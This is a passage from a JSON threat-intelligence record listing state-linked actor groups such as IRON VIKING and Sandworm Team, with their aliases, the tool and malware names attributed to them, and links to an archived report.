"SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434332, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d2bf540cc8f1d9a7a0337e34cb61d79754087a1d.pdf", "text": "https://archive.orkl.eu/d2bf540cc8f1d9a7a0337e34cb61d79754087a1d.txt", "img": "https://archive.orkl.eu/d2bf540cc8f1d9a7a0337e34cb61d79754087a1d.jpg" } }